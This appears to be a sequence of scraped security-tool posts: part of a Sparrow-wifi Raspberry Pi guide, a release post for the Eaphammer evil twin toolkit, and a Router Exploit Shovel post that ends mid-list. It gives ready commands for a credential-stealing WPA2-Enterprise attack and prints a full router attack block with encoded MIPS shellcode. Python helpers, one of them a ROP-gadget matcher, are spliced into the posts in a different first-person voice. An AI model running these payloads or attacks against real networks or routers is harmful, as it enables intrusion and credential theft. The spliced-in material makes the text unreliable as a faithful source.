If you don't have a second set of hands while flying your drone and want to fly the Pi without having to worry about the agent, you can start the agent in auto-record mode. There are a few scripts in the scripts directory that start with 'rpi' that can be scheduled for monitoring the agent and starting it as appropriate. The overall intention is a headless configuration where the Pi starts up (you'll need to configure the wifi on the Pi ahead of time to automatically connect to the controller wifi network), the agent is started and automatically goes into wifi record mode using the drone's GPS for recording. Once you're done, the sparrow-wifi agent menu gives you a screen to manage the files in the recordings directory on the agent and download or delete the files there. These scripts in the scripts directory are just samples. It is highly recommended that you customize them and the Pi integration to meet your specific needs, and by all means keep safety (and federal regulations) in mind when doing anything with a drone, as you're responsible for both.<br />
<br />
<span style="font-size: large;"><b>Raspberry Pi Notes</b></span><br />
<br />
<b>Raspbian Stretch</b><br />
Raspbian Stretch now includes the correct version of Python, so no more custom Python builds. The only thing that still has to be handled by hand is that PyQtChart is neither in the apt repository nor buildable via pip on Raspbian. However, thanks to the folks in this thread: <a href="https://github.com/mu-editor/mu/issues/441" rel="nofollow" target="_blank" title="https://github.com/mu-editor/mu/issues/441">https://github.com/mu-editor/mu/issues/441</a>, I've been able to reproduce their PyQtChart build process on Raspbian Stretch. So to make everyone's life easier, the project now includes a script called rpi.setup_prerequisites.sh. Run that script with sudo first, then Sparrow "should" work for you. I tested it on a Pi 3B board with the 7" touchscreen and it works great.<br />
<br />
<b>Raspbian Jessie</b><br />
You can run the remote agent on a Raspberry Pi, but the installation requirements are a bit different. Python 3 did not include some of the subprocess module capabilities in the initial 3.x versions prior to 3.5; they were put back from 3.5 forward. In terms of Raspbian builds, Raspbian Squeeze only has Python 3.4.x in the repository, so the first step is to download and build Python 3.5. If you're running Debian Stretch (the latest as of this writing) you can skip the 3.5 build, since its repositories do have Python 3.5.<br />
You can use the following sequence to build Python if you need to (apt-get install libsqlite3-dev before building Python, since sqlite support is compiled in):<br />
<pre><code>sudo apt-get install libsqlite3-dev
cd /tmp
wget https://www.python.org/ftp/python/3.5.5/Python-3.5.5.tgz
tar -zxvf Python-3.5.5.tgz
cd Python-3.5.5
./configure && make -j3 && sudo make install</code></pre>
Once that is done, install the necessary modules into the 3.5 build: <code>sudo pip3.5 install gps3 dronekit manuf python-dateutil</code><br />
Then you can run the agent directly with commands like this:<br />
<pre><code>/usr/local/bin/python3.5 ./sparrowwifiagent.py
/usr/local/bin/python3.5 ./sparrowwifiagent.py --mavlinkgps=3dr --recordinterface=wlan0</code></pre>
Note that if you forget to start them with 3.5 specifically, you will get an exception, since a subprocess function will be missing.<br />
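A small preflight check for the interpreter problem just described, added here as an example (it is my code, not part of sparrow-wifi). It verifies that the interpreter about to run the agent is at least Python 3.5 and that the modules listed above can be imported, and exits non-zero otherwise, so a launcher script or systemd unit refuses to start the agent instead of failing later with a missing-function exception. The function and variable names are mine; the module list is the one given above (python-dateutil is imported as <code>dateutil</code>).<br />

```python
import importlib.util
import sys

# Modules the page says to install into the 3.5 build:
# gps3 dronekit manuf python-dateutil (python-dateutil imports as "dateutil").
AGENT_MODULES = ("gps3", "dronekit", "manuf", "dateutil")
MIN_VERSION = (3, 5)


def module_available(name):
    """True if 'name' can be imported by this interpreter (probed without importing it)."""
    return importlib.util.find_spec(name) is not None


def check_agent_prereqs(version=None, modules=AGENT_MODULES, available=module_available):
    """Return a list of problems that would stop sparrowwifiagent.py from running.

    version:   (major, minor, micro) to check; defaults to the running interpreter.
    available: predicate used to probe modules (a parameter so it can be stubbed in tests).
    An empty list means the interpreter looks usable for the agent.
    """
    if version is None:
        version = tuple(sys.version_info[:3])
    problems = []
    if tuple(version[:2]) < MIN_VERSION:
        # The failure the page warns about: the subprocess functions the agent uses
        # exist only from 3.5 on, so an older python3 dies later with an exception.
        problems.append("python >= %d.%d required, found %d.%d.%d"
                        % (MIN_VERSION + tuple(version[:3])))
    for name in modules:
        if not available(name):
            problems.append("missing module: %s (install it with pip for this interpreter)" % name)
    return problems


if __name__ == "__main__":
    issues = check_agent_prereqs()
    for line in issues:
        print("PREFLIGHT:", line)
    # Non-zero exit lets a wrapper script or unit file refuse to start the agent.
    sys.exit(1 if issues else 0)
```

Run it with the same interpreter you intend to start the agent with (e.g. <code>/usr/local/bin/python3.5 preflight.py &amp;&amp; /usr/local/bin/python3.5 ./sparrowwifiagent.py</code>), since the check is only meaningful for the interpreter that executes it.<br />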
Another important note about dual-band USB wireless adapters on the Raspberry Pi (tested on a Pi 3): as long as the internal wireless is enabled, Raspbian won't see the 5 GHz band.<br />
Add this line to /boot/config.txt to disable the internal wireless; your dual-band USB adapter will then be able to see the 5 GHz band:<br />
<pre><code>dtoverlay=pi3-disable-wifi</code></pre>
The red and green LEDs are also used on the Raspberry Pi to provide some visual feedback:<br />
<ol>
<li>Both lights off - Initializing</li>
<li>Red LED Heartbeat - gpsd found but unsynchronized (red light will stay off if gpsd is not installed or not running)</li>
<li>Red LED Solid - gpsd receiver synchronized</li>
<li>Green LED Solid - Agent HTTP server is up and the agent is operational and ready to serve requests</li>
</ol>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/ghostop14/sparrow-wifi" rel="nofollow" target="_blank" title="Download Sparrow-Wifi">Download Sparrow-Wifi</a></span></b></div>
<h1>Eaphammer v1.9.0 - Targeted Evil Twin Attacks Against WPA2-Enterprise Networks</h1>
<p>Published 2019-10-15</p>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-2_rMwc1KMBQ/XZ_486tRmuI/AAAAAAAAQkw/Xt2Niq-r-dQhbkx2D0qAvtL8o0npgjS6gCNcBGAsYHQ/s1600/eaphammer_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="341" data-original-width="928" height="234" src="https://1.bp.blogspot.com/-2_rMwc1KMBQ/XZ_486tRmuI/AAAAAAAAQkw/Xt2Niq-r-dQhbkx2D0qAvtL8o0npgjS6gCNcBGAsYHQ/s640/eaphammer_1.png" width="640" /></a></div>
<br />
by Gabriel Ryan (<a href="https://twitter.com/s0lst1c3" rel="nofollow" target="_blank" title="s0lst1c3">s0lst1c3</a>)(gryan[at]specterops.io)<br />
<br />
EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full-scope wireless assessments and red team engagements. As such, the focus is on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate just how fast this tool is, the Quick Start section shows how to execute a credential-stealing evil twin attack against a WPA/2-EAP network in only a few commands.<br />
<a name='more'></a><br />
<span style="font-size: x-large;"><b>Quick Start Guide (Kali)</b></span><br />
Begin by cloning the <strong>eaphammer</strong> repo using the following command:<br />
<pre><code>git clone https://github.com/s0lst1c3/eaphammer.git</code></pre>
Next run the kali-setup file as shown below to complete the eaphammer setup process. This will install dependencies and compile the project:<br />
<pre><code>./kali-setup</code></pre>
To setup and execute a credential stealing evil twin attack against a WPA/2-EAP network:<br />
<pre><code># generate certificates
./eaphammer --cert-wizard
# launch attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds</code></pre>
<br />
<span style="font-size: x-large;"><b>Usage and Setup Instructions</b></span><br />
For complete usage and setup instructions, please refer to the project's wiki page:<br />
<ul>
<li><a href="https://github.com/s0lst1c3/eaphammer/wiki" rel="nofollow" target="_blank" title="https://github.com/s0lst1c3/eaphammer/wiki">https://github.com/s0lst1c3/eaphammer/wiki</a></li>
</ul>
<br />
<span style="font-size: x-large;"><b>Features</b></span><br />
<ul>
<li>Steal RADIUS <a href="https://www.kitploit.com/search/label/Credentials" target="_blank" title="credentials">credentials</a> from WPA-EAP and WPA2-EAP networks.</li>
<li>Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots</li>
<li>Perform <a href="https://www.kitploit.com/search/label/Captive%20Portal" target="_blank" title="captive portal">captive portal</a> attacks</li>
<li>Built-in Responder integration</li>
<li>Support for Open networks and WPA-EAP/WPA2-EAP</li>
<li>No manual configuration necessary for most attacks.</li>
<li>No manual configuration necessary for installation and setup process</li>
<li>Leverages latest version of hostapd (2.8)</li>
<li>Support for evil twin and karma attacks</li>
<li>Generate timed Powershell payloads for indirect wireless pivots</li>
<li>Integrated HTTP server for Hostile Portal attacks</li>
<li>Support for SSID cloaking</li>
<li>Fast and automated PMKID attacks against PSK networks using hcxtools</li>
<li>Password spraying across multiple usernames against a single ESSID</li>
</ul>
<br />
<span style="font-size: large;"><b>New (as of Version 1.7.0)(latest):</b></span><br />
EAPHammer now supports WPA/2-PSK along with WPA handshake captures.<br />
<br />
<span style="font-size: large;"><b>OWE (added as of Version 1.5.0):</b></span><br />
EAPHammer now supports rogue AP attacks against OWE and OWE-Transition mode networks.<br />
<br />
<span style="font-size: large;"><b>PMF (added as of Version 1.4.0)</b></span><br />
EAPHammer now supports 802.11w (Protected <a href="https://www.kitploit.com/search/label/Management" target="_blank" title="Management">Management</a> Frames), Loud Karma attacks, and Known Beacon attacks (documentation coming soon).<br />
<br />
<span style="font-size: large;"><b>GTC Downgrade Attacks</b></span><br />
EAPHammer will now automatically attempt a GTC Downgrade attack against connected clients in an attempt to capture plaintext credentials (see: <a href="https://www.youtube.com/watch?v=-uqTqJwTFyU&feature=youtu.be&t=22m34s" rel="nofollow" target="_blank" title="https://www.youtube.com/watch?v=-uqTqJwTFyU&feature=youtu.be&t=22m34s">https://www.youtube.com/watch?v=-uqTqJwTFyU&feature=youtu.be&t=22m34s</a>).<br />
<br />
<span style="font-size: large;"><b>Improved Certificate Handling</b></span><br />
EAPHammer's Cert Wizard has been expanded to provide users with the ability to create, import, and manage SSL <a href="https://www.kitploit.com/search/label/Certificates" target="_blank" title="certificates">certificates</a> in a highly flexible manner. Cert Wizard's previous functionality has been preserved as Cert Wizard's Interactive Mode, which uses the same syntax as previous versions. See <a href="https://github.com/s0lst1c3/eaphammer#xiii---cert-wizard" rel="nofollow" target="_blank" title="XIII - Cert Wizard">XIII - Cert Wizard</a> for additional details.<br />
<br />
<span style="font-size: large;"><b>TLS / SSL Backwards Compatibility</b></span><br />
EAPHammer now uses a local build of libssl that exists independently of the systemwide install. This local version is compiled with support for SSLv3, allowing EAPHammer to be used against legacy clients without compromising the integrity of the attacker's operating system.<br />
<br />
<span style="font-size: large;"><b>Supported EAP Methods</b></span><br />
EAPHammer supports the following EAP methods:<br />
<ul>
<li>EAP-PEAP/MSCHAPv2</li>
<li>EAP-PEAP/GTC</li>
<li>EAP-PEAP/MD5</li>
<li>EAP-TTLS/PAP</li>
<li>EAP-TTLS/MSCHAP</li>
<li>EAP-TTLS/MSCHAPv2</li>
<li>EAP-TTLS/MSCHAPv2 (no EAP)</li>
<li>EAP-TTLS/CHAP</li>
<li>EAP-TTLS/MD5</li>
<li>EAP-TTLS/GTC</li>
<li>EAP-MD5</li>
</ul>
<br />
<span style="font-size: large;"><b>802.11a and 802.11n Support</b></span><br />
EAPHammer now supports attacks against 802.11a and 802.11n networks. This includes the ability to create access points that support the following features:<br />
<ul>
<li>Both 2.4 GHz and 5 GHz channel support</li>
<li>Full MIMO support (multiple input, multiple output)</li>
<li>Frame aggregation</li>
<li>Support for 40 MHz channel widths using channel bonding</li>
<li>High Throughput Mode</li>
<li>Short Guard Interval (Short GI)</li>
<li>Modulation & coding scheme (MCS)</li>
<li>RIFS</li>
<li>HT power management</li>
</ul>
<br />
<span style="font-size: x-large;"><b>Upcoming Features</b></span><br />
<ul>
<li>Perform seamless MITM attacks with partial HSTS bypasses</li>
<li>Directed rogue AP attacks (deauth then evil twin from PNL, deauth then karma + ACL)</li>
<li>Integrated website cloner for cloning captive portal login pages</li>
<li>Integrated HTTP server for captive portals</li>
</ul>
<br />
<span style="font-size: x-large;"><b>Contributing</b></span><br />
Contributions are encouraged and more than welcome. Please attempt to adhere to the provided issue and feature request templates.<br />
<br />
<span style="font-size: x-large;"><b>Versioning</b></span><br />
We use <a href="http://semver.org/" rel="nofollow" target="_blank" title="SemVer">SemVer</a> for versioning (or at least make an effort to). For the versions available, see <a href="https://github.com/s0lst1c3/eaphammer/releases" rel="nofollow" target="_blank" title="https://github.com/s0lst1c3/eaphammer/releases">https://github.com/s0lst1c3/eaphammer/releases</a>.<br />
<br />
<span style="font-size: x-large;"><b>License</b></span><br />
This project is licensed under the GNU Public License 3.0 - see the <a href="https://github.com/s0lst1c3/eaphammer/blob/master/LICENSE.md" rel="nofollow" target="_blank" title="LICENSE.md">LICENSE.md</a> file for details.<br />
<br />
<span style="font-size: x-large;"><b>Acknowledgments</b></span><br />
This tool either builds upon, is inspired by, or directly incorporates nearly fifteen years of prior research and development from the following awesome people:<br />
<ul>
<li>Brad Antoniewicz</li>
<li>Joshua Wright</li>
<li>Robin Wood</li>
<li>Dino Dai Zovi</li>
<li>Shane Macauly</li>
<li>Domanic White</li>
<li>Ian de Villiers</li>
<li>Michael Kruger</li>
<li>Moxie Marlinspike</li>
<li>David Hulton</li>
<li>Josh Hoover</li>
<li>James Snodgrass</li>
<li>Adam Toscher</li>
<li>George Chatzisofroniou</li>
<li>Mathy Vanhoef</li>
</ul>
For a complete description of what each of these people has contributed to the current wireless security landscape and this tool, please see:<br />
<ul>
<li><a href="https://github.com/s0lst1c3/eaphammer/wiki/Acknowledgements" rel="nofollow" target="_blank" title="https://github.com/s0lst1c3/eaphammer/wiki/Acknowledgements">https://github.com/s0lst1c3/eaphammer/wiki/Acknowledgements</a></li>
</ul>
EAPHammer leverages a modified version of <a href="https://github.com/opensecurityresearch/hostapd-wpe" rel="nofollow" target="_blank" title="hostapd-wpe">hostapd-wpe</a> (shoutout to <a href="https://github.com/brad-anton" rel="nofollow" target="_blank" title="Brad Anton">Brad Anton</a> for creating the original), <em>dnsmasq</em>, <a href="https://github.com/joswr1ght/asleap" rel="nofollow" target="_blank" title="asleap">asleap</a>, <a href="https://github.com/ZerBea/hcxtools" rel="nofollow" target="_blank" title="hcxpcaptool">hcxpcaptool</a> and <a href="https://github.com/ZerBea/hcxdumptool" rel="nofollow" target="_blank" title="hcxdumptool">hcxdumptool</a> for PMKID attacks, <a href="https://github.com/SpiderLabs/Responder" rel="nofollow" target="_blank" title="Responder">Responder</a>, and <em>Python 3.5+</em>.<br />
Finally, huge shoutout to the <a href="https://specterops.io/" rel="nofollow" target="_blank" title="SpecterOps">SpecterOps</a> crew for supporting this project and being a constant source of inspiration.<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/s0lst1c3/eaphammer" rel="nofollow" target="_blank" title="Download Eaphammer">Download Eaphammer</a></span></b></div>
<h1>Router Exploit Shovel - Automated Application Generation For Stack Overflow Types On Wireless Routers</h1>
<p>Published 2019-09-24</p>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-_FQH-PZZfpY/XYqHLxzo1BI/AAAAAAAAQZg/rMUxfSpzXAUswop0k_J8GjxHKqCiUs9IgCNcBGAsYHQ/s1600/Router-Exploit-Shovel_2_screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="809" data-original-width="1600" height="322" src="https://1.bp.blogspot.com/-_FQH-PZZfpY/XYqHLxzo1BI/AAAAAAAAQZg/rMUxfSpzXAUswop0k_J8GjxHKqCiUs9IgCNcBGAsYHQ/s640/Router-Exploit-Shovel_2_screenshot.png" width="640" /></a></div>
<br />
Automated Application Generation for Stack Overflow Types on <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="Wireless">Wireless</a> Routers<br />
Router Exploit Shovel is an automated application generation tool for stack-overflow-type vulnerabilities on wireless routers. The tool implements the key functions of an <a href="https://www.kitploit.com/search/label/Exploits" target="_blank" title="exploits">exploit</a>: it adapts to the length of the data padding on the stack, generates the ROP chain, generates the encoded shellcode, and finally assembles them into a complete attack code. The user only needs to attach the attack code at the overflow location of the PoC to complete the remote code execution exploit.<br />
The tool supports MIPSel and MIPSeb and runs on Ubuntu 16.04 64-bit.<br />
<a name='more'></a><br />
<span style="font-size: large;"><b>Install</b></span><br />
Make sure you have git, python3 and setuptools installed. Download the source code from our GitHub:<br />
<div>
<pre><code>$ git clone https://github.com/arthastang/Router-Exploit-Shovel.git</code></pre>
</div>
Set up environment and install dependencies:<br />
<div>
<pre><code>$ cd Router-Exploit-Shovel/
$ python3 setup.py install</code></pre>
</div>
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
<div>
<pre><code>$ python3 Router_Exploit_Shovel.py -h
Usage: Router_Exploit_Shovel.py [options]
Options:
  -h, --help            show this help message and exit
  -b BINARYFILEPATH, --binaryFile=BINARYFILEPATH
                        input binary file path
  --ba=BINARYBASEADDR, --binaryBaseAddr=BINARYBASEADDR
                        input binary base address,default=0x00400000
  -l LIBRARYFILEPATH, --libraryFile=LIBRARYFILEPATH
                        input libc file path
  --la=LIBRARYBASEADDR, --libraryBaseAddr=LIBRARYBASEADDR
                        input library base address,default=0x2aae2000
  -o OVERFLOWFUNCTIONPOINTOFFSET, --overflowPoint=OVERFLOWFUNCTIONPOINTOFFSET
                        input overflow function point offset
  --arch=ARCH           input architecture of elf files,[little] or
                        [big],default=big</code></pre>
</div>
For example:<br />
<div>
<pre><code>$ python3 Router_Exploit_Shovel.py -b test_binaries/mipseb-httpd -l test_binaries/libuClibc-0.9.30.so -o 0x00478584</code></pre>
</div>
<br />
<span style="font-size: large;"><b>Code structure</b></span><br />
<div>
<pre><code>--Router_Exploit_Shovel.py #Startup script
--databases/
|---ROP_patterns/ #YAML file of ROP patterns
|---shellcodes/ #YAML file of shellcodes
--example/ #Nday vulnerabilities, full report and exploit code
--results/
|---ROP_gadgets/ #ROP gadgets generating results
|---attackBlock.txt #Attack block generating results
--ropper/ #Modified ropper module to get all gadgets
--filebytes/ #Filebytes module to load ELFs
--router_exp_shovel/ #Main module
|---offset_calculator/ #Calculate padding size
|---ROP_maker/ #Make ROP chains
|---shellcode_maker/ #Make shellcodes
--qemuTestEnvironment/ #MIPS run-environment for router exploitation</code></pre>
</div>
<br />
<span style="font-size: large;"><b>ROP chain generation</b></span><br />
This tool uses patterns to generate ROP chains. The patterns are extracted from common ROP <a href="https://www.kitploit.com/search/label/Exploitation" target="_blank" title="exploitation">exploitation</a> procedures, and regex matching is used to find available gadgets to fill the chain string. The patterns are stored Base64-encoded to avoid escaping problems with the repeated special characters. For example:<br />
<div>
<pre><code>chainString: (gadget2)(gadget1)BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB(sleep)CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC(call_code)DDDD(stack_gadget)\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44
gadget1: KC4qKW1vdmUgXCR0OVwsIFwkczE7IGx3IFwkcmFcLCAweDI0XChcJHNwXCk7IGx3IFwkczFcLCAweDIwXChcJHNwXCk7IGx3IFwkczBcLCAweDFjXChcJHNwXCk7KC4qKTsganIgXCR0OTsgYWRkaXUgXCRzcFwsIFwkc3BcLCAweDI4Ow==
#gadget1: (.*)move \\$t9\\, \\$s1; lw \\$ra\\, 0x24\\(\\$sp\\); lw \\$s1\\, 0x20\\(\\$sp\\); lw \\$s0\\, 0x1c\\(\\$sp\\);(.*); jr \\$t9; addiu \\$sp\\, \\$sp\\, 0x28;
gadget2: KC4qKWFkZGl1IFwkYTBcLCBcJHplcm9cLCAxOyBtb3ZlIFwkdDlcLCBcJHMxOyBqYWxyIFwkdDk7
#gadget2: (.*)addiu \\$a0\\, \\$zero\\, 1; move \\$t9\\, \\$s1; jalr \\$t9;
call_code: KC4qKW1vdmUgXCR0OVwsIFwkczI7IGphbHIgXCR0OTs=
#call_code: (.*)move \\$t9\\, \\$s2; jalr \\$t9;
stack_gadget: KC4qKWFkZGl1IFwkczJcLCBcJHNwXCwgMHgxODsoLiopbW92ZSBcJHQ5XCwgXCRzMDsgamFsciBcJHQ5Ow==
#stack_gadget: (.*)addiu \\$s2\\, \\$sp\\, 0x18;(.*)move \\$t9\\, \\$s0; jalr \\$t9;</code></pre>
</div>
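To make the pattern mechanism concrete, here is an added example (my code, not the tool's). It base64-decodes the four patterns shown above into the regular expressions they hold, runs them with <code>re.match</code> over a constructed gadget dump in ropper's "address: instructions;" layout (placeholder addresses, not from any firmware), and then reports which placeholders of the chain template still have no gadget. Treating <code>(sleep)</code> as a library symbol rather than a gadget pattern is my assumption, as is the gadget-line layout.<br />

```python
import base64
import re

# The four patterns exactly as the page shows them stored in the tool's YAML:
# base64 of a regular expression over one gadget's disassembly.
PATTERNS_B64 = {
    "gadget1": "KC4qKW1vdmUgXCR0OVwsIFwkczE7IGx3IFwkcmFcLCAweDI0XChcJHNwXCk7IGx3IFwkczFcLCAweDIwXChcJHNwXCk7IGx3IFwkczBcLCAweDFjXChcJHNwXCk7KC4qKTsganIgXCR0OTsgYWRkaXUgXCRzcFwsIFwkc3BcLCAweDI4Ow==",
    "gadget2": "KC4qKWFkZGl1IFwkYTBcLCBcJHplcm9cLCAxOyBtb3ZlIFwkdDlcLCBcJHMxOyBqYWxyIFwkdDk7",
    "call_code": "KC4qKW1vdmUgXCR0OVwsIFwkczI7IGphbHIgXCR0OTs=",
    "stack_gadget": "KC4qKWFkZGl1IFwkczJcLCBcJHNwXCwgMHgxODsoLiopbW92ZSBcJHQ5XCwgXCRzMDsgamFsciBcJHQ5Ow==",
}

# Chain template from the page, with the long trailing padding left off.
CHAIN_STRING = "(gadget2)(gadget1)" + "B" * 32 + "(sleep)" + "C" * 32 + "(call_code)DDDD(stack_gadget)"

# Constructed sample gadget dump in the "address: instructions;" layout ropper prints.
# Addresses are placeholders, not taken from any real firmware.
SAMPLE_GADGETS = [
    "0x00400100: addiu $a0, $zero, 1; move $t9, $s1; jalr $t9; ",
    "0x00400180: addiu $a0, $zero, 2; move $t9, $s1; jalr $t9; ",   # near miss: wrong immediate
    "0x00400200: addiu $s2, $sp, 0x18; lw $ra, 0x2c($sp); move $t9, $s0; jalr $t9; ",
    "0x00400300: move $t9, $s2; jalr $t9; ",
    "0x00400380: lw $ra, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x20; ",
]

# Placeholders filled from libc rather than from gadget patterns (assumption).
LIBRARY_SYMBOLS = ("sleep",)


def decode_patterns(b64_map):
    """base64 -> regex text. Keeping the regex base64-encoded keeps its many
    backslashes out of the YAML file, which is the escaping problem the page mentions."""
    return {name: base64.b64decode(b64).decode("ascii") for name, b64 in b64_map.items()}


def find_gadgets(gadget_lines, patterns):
    """Return {pattern_name: [matching gadget lines]}. re.match anchors at the start,
    so the leading (.*) swallows the address prefix and the instruction text must
    then follow exactly as the pattern spells it."""
    found = {}
    for name, pattern in patterns.items():
        rx = re.compile(pattern)
        found[name] = [line for line in gadget_lines if rx.match(line)]
    return found


def chain_placeholders(chain_string):
    """Placeholder names in the order the chain template uses them."""
    return re.findall(r"\(([A-Za-z0-9_]+)\)", chain_string)


def unresolved_placeholders(chain_string, found, library_symbols=LIBRARY_SYMBOLS):
    """Placeholders that neither a matched gadget nor a library symbol can fill.
    An empty list means the chain could be assembled from this gadget dump."""
    return [name for name in chain_placeholders(chain_string)
            if name not in library_symbols and not found.get(name)]


if __name__ == "__main__":
    patterns = decode_patterns(PATTERNS_B64)
    found = find_gadgets(SAMPLE_GADGETS, patterns)
    for name, hits in found.items():
        print("%-13s %s" % (name, hits[0].split(":")[0] if hits else "(no gadget found)"))
    print("unresolved:", unresolved_placeholders(CHAIN_STRING, found))
```

With the constructed dump, gadget2, call_code and stack_gadget each resolve to one line while gadget1 has no candidate, so the chain cannot be completed from that dump; the same check run over a real ropper dump tells you before assembly which pattern a given binary lacks.<br />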
<br />
<span style="font-size: large;"><b>Attackblocks</b></span><br />
You can find the generated attack blocks in results/attackBlocks.txt, for example:<br />
<div>
<pre><code>attackBlock = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x2a\xb3\x7c\x60\x2a\xb2\xbd\xfcBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\x2a\xb3\x5c\xa0CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\x2a\xb0\x09\x38DDDD\x2a\xaf\x76\x68\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x3c\x11\x99\x99\x36\x31\x99\x99\x27\xb2\x05\x4b\x22\x52\xfc\xa0\x8e\x4a\xfe\xf9\x02\x2a\x18\x26\xae\x43\xfe\xf9\x8e\x4a\xff\x41\x02\x2a\x18\x26\xae\x43\xff\x41\x8e\x4a\xff\x5d\x02\x2a\x18\x26\xae\x43\xff\x5d\x8e\x4a\xff\x71\x02\x2a\x18\x26\xae\x43\xff\x71\x8e\x4a\xff\x8d\x02\x2a\x18\x26\xae\x43\xff\x8d\x8e\x4a\xff\x99\x02\x2a\x18\x26\xae\x43\xff\x99\x8e\x4a\xff\xa5\x02\x2a\x18\x26\xae\x43\xff\xa5\x8e\x4a\xff\xad\x02\x2a\x18\x26\xae\x43\xff\xad\x8e\x4a\xff\xb9\x02\x2a\x18\x26\xae\x43\xff\xb9\x8e\x4a\xff\xc1\x02\x2a\x18\x26\xae\x43\xff\xc1\x24\x12\xff\xff\x24\x02\x10\x46\x24\x0f\x03\x08\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa\x27\xa4\xfb\xfa\x01\x01\x01\x0c\x21\x8c\x11\x5c\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x98\x59\xb9\xbe\x01\xc0\x28\x27\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\x23\x39\x44\x44\x30\x50\xff\xff\x24\x0e\xff\xef\x01\xc0\x70\x27\x24\x0d\x7a\x69\x24\x0f\xfd\xff\x01\xe0\x78\x27\x01\xcf\x78\x04\x01\xaf\x68\x25\xaf\xad\xff\xe0\xaf\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff\xec\x9b\x89\xb9\xbc\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5\xff\xe0\x24\x02\x10\x49\x01\x01\x01\x0c\x24\x0f\x73\x50\x9b\x89\xb9\xbc\x24\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x24\x0f\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02\x10\x48\x01\x01\x01\x0c\x24\x0f\x73\x50\x30\x50\xff\xff\x9b\x89\xb9\xbc\x24\x0f\xff\xfd\x01\xe0\x28\x27\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f\x73\x50\x9b\x89\xb9\xbc\x28\x05\x01\x01\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\xbd\x9b\x96\x46\x01\x01\x01\x0c\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01\x0c\x24\x02\x10\x46\x24\x0f\x03\x68\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa\x27\xa4\xfb\xfe\x01\x01\x01\x0c\x21\x8c\x11\x5c"</code></pre>
</div>
<br />
<span style="font-size: large;"><b>Dependencies</b></span><br />
<ul>
<li>Ropper: an awesome tool for dumping binary information and generating ROP chains. <a href="https://github.com/sashs/Ropper" rel="nofollow" target="_blank" title="https://github.com/sashs/Ropper">https://github.com/sashs/Ropper</a></li>
<li>filebytes: library to read and edit ELF, PE, Mach-O and OAT files. <a href="https://scoding.de/filebytes-introduction" rel="nofollow" target="_blank" title="https://scoding.de/filebytes-introduction">https://scoding.de/filebytes-introduction</a></li>
<li>yaml: YAML Ain't Markup Language. <a href="https://yaml.org/" rel="nofollow" target="_blank" title="https://yaml.org/">https://yaml.org/</a></li>
